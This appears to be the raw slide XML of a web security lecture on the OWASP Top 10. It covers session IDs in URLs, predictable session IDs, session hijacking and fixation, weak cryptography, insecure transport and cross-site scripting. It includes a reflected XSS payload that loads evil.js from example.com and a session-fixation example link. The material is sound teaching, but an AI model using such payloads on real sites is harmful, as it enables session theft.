              <a:t>ccccadcmmlflijgcflfcfmgdglndfkm.0:@@@@0460548002.1099846334@@@@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&lt;server instance ID&gt;.0:@@@@&lt;random number&gt;.&lt;clock tick&gt;@@@@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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Mozilla was setup to deny cookies from the site</a:t>
            </a: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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The site was setup to redirect any user without a BV_IDS cookie to a no-cookie page</a:t>
            </a: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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The no-cookie page redirects the user back to the initial page, creates a redirect loop</a:t>
            </a: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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Over 20,000 requests were issued from one IP, and 20,000 different sessions were created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>When the hourly session clean up occurred, the server hung due to the number of sessions created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Most newer versions of Mozilla/IE browser have a redirect limit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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID in URL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9530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The use of session ID in the URL should be discouraged.  The URL can be </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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cached by a search engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Recorded in proxy logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Retained in URL dropdown list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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A search in the google for site, with sessionID “inurl:sessionID” in the URL and the word “shopping cart”, turns up 112,000 entries.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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.purposedrivenlife.com/basket.aspx?UserID=228473&amp;SessionID=2jQvliAq0Jb24SXYu2kF&amp;SID=1&amp;Category_ID=2&amp;Product_ID=95</a:t>
            </a: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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://ue.eu.int/cms3_applications/applications/librarie/freeBookShop.asp?SessionID=201241131271825256632533-706011819&amp;LANG=EN&amp;BookType=1&amp;SessLang=EN&amp;cmsID=544</a:t>
            </a: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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.systematika.it/results.asp?SKU_PUBLISHER=CPB1360WWFS180&amp;SessionID=1073331003</a:t>
            </a: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400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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID Analysis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915400" cy="44958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en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>What do you notice about this session id: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400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>http://www.securehq.com/superdept.wml&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sessionid=201210912413626981</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&amp;superdeptid=30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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID Analysis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altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>What do you notice about this session id:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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200" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>http://www.securehq.com/superdept.wml&amp;sessionid=201210912413626981&amp;superdeptid=30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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>What do you notice now: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201210912413626981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201211711192314454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201211711203214472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201211711211114480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201211711215014488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201211711222814508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201211711253414520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201211711295414547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urier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711333214562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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session ID Analysis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4958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http://www.securehq.com/superdept.wml&amp;sessionid=201210912413626981&amp;superdeptid=30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201210912413626981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201211711192314454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201211711203214472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201211711211114480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201211711215014488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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>201211711</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>22281</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>4508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201211711253414520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201211711295414547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201211711333214562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2012 - Year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11 - Month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7 - Date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11 – Hour (??)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22281 -  (Unknown)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4508 – Incremental Value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7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Session Hijacking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solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Session Hijacking – Capturing the session cookies and assume the identity of another user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000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en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The session ID can be gained using Cross-Site Scripting attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The session ID can be brute forced </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>To test for session hijacking attacks are usually done using two separate browsers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000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en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Mozilla/Netscape/Firefox – Uses shared memory for cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Internet Explorer – Uses separate memory for each newly created instance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Session Fixation Attack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772400" cy="41148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Session Fixation Attack is the idea of induce an application to inadvertently accept a Session ID set by the User.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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.net-security.org/dl/articles/session_fixation.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128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An attacker sets a pre-determined Session ID in the URL, persuade the unsuspecting user to authenticate, and hijack the session.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Example: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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://dentistry.superlinks.com/admin/main.cfm?CFID=000000&amp;CFTOKEN=000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr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smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック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Sent the link to an unsuspecting user, and the user authenticates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The 000000 value for CFID/CFTOKEN becomes a valid session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smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Someone can hijack the session using the known session ID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467600" cy="792163"/>
          </a:xfrm>
        </p:spPr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8. Ensure Cryptographic Storage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467600" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Web applications rarely use cryptographic functions properly to protect data and credentials. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Common examples include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Not encrypting sensitive data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Using home grown algorithms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Insecure use of strong algorithm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Continued use of proven weak algorithm (MD5, SHA-1, RC3, RC4, etc…)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Hard coding keys, and storing keys in unprotected stores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use of Encoding instead of encryption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</p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>10 (2012) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>and its evolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="394340" name="Group 100"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="762000" y="1600200"/>
          <a:ext cx="8001000" cy="5029200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3127375"/>
                <a:gridCol w="3346450"/>
                <a:gridCol w="152717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OWASP top 10 2007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OWASP top 10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2012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0" charset="0"/>
                        <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        <a:cs typeface="Arial Unicode MS" pitchFamily="-11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MITRE 2006 Raw Ranking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1. Cross Site Scripting (XSS)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4. Cross Site Scripting (XSS)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2. Injection flaws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6. Injection flaws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3. Malicious file execution (new)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0" charset="0"/>
                        <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        <a:cs typeface="Arial Unicode MS" pitchFamily="-11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4. Insecure Direct Object Reference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2. Broken Access control  (split in 2007 top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5. Cross Site Request Forgery (CSRF) (New)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-110" charset="0"/>
                        <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                        <a:cs typeface="Arial Unicode MS" pitchFamily="-11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6. Information Leakage and Improper Error Handling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7. Improper error handling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7. Broken Authentication and Session Management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3. Broken Authentication and Session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8. Insecure Cryptographic Storage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8. Insecure Storage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9. Insecure Communication (New)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Discussed in 10. Insecure Configuration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10. Failure to Restrict URL Access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2. Broken Access Control (split in 2007 top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&lt;removed in 2007&gt;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1. Unvalidated input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&lt;removed in 2007&gt;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5. Buffer Overflows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4, 8, and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&lt;removed in 2007&gt;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9. Denial of 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&lt;removed in 2007&gt;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10. Insecure Configuration Management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-110" charset="0"/>
                          <a:ea typeface="Arial Unicode MS" pitchFamily="-110" charset="0"/>
                          <a:cs typeface="Arial Unicode MS" pitchFamily="-110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467600" cy="792163"/>
          </a:xfrm>
        </p:spPr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8. Ensure Cryptographic Storage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58200" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Prevention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Do not create your own cryptographic algorithms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Do not use weak algorithms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Generate keys offline and store private keys with extreme care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Ensure infrastructure credentials are properly secured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRP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Ensure that encrypted data stored on disk is not easy to decrypt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Never store unnecessary data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>e.g. POS terminals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792163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>9. Insecure Communications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772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Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.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Example: application failed to encrypt network traffic, or using SSL improperly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Prevention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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use SSL for all connections that are authenticated or transmitting sensitive or valuable data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Such as: credentials, credit card details, health and other private information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>When using SSL library be aware of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Certification validation often checked as default as part of the library. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>BUT, do not make that assumption. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>However, a valid certificate does NOT mean it is the right certificate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	Libraries don’t check that, application must validate every field, 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especially “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>subjectAltName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Checking CRL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	Most libraries, today, do not check that as default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	Checking it typically requires a lot code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="19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467600" cy="715963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>10. Failure to Restrict URL Access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900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>“Hidden” or “specialized” URLs, unfortunately, many of them deal with systems admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention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Ensure that access control matrix is part of the business, architecture,  and design of the application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Ensure that all URLs and business functions are protected by an effective  access control mechanism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Perform a penetration test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Pay close attention to include/library files (especially those that are  executable, e.g. .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500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Do not assume that users will be unaware of special or hidden URLs or  APIs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Block to all file types that your application should never use (e.g. only  allow .html, .pdf, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500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1500" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Keep up to date with virus protection and patches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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>1. XSS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5438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en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Simple example:  echo $UnvalidatedOutput</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Types of XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> UnvalidatedOuput = user_input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>user_input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>might be: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>%3Cscript%20src%3D%22http%3A//example.com/evil.js%22%3E%3C/script%3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Which may be returned to browser as:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/evil.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>UnvaliatedOutput comes from storage (e.g. database, BLOG, configuration file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
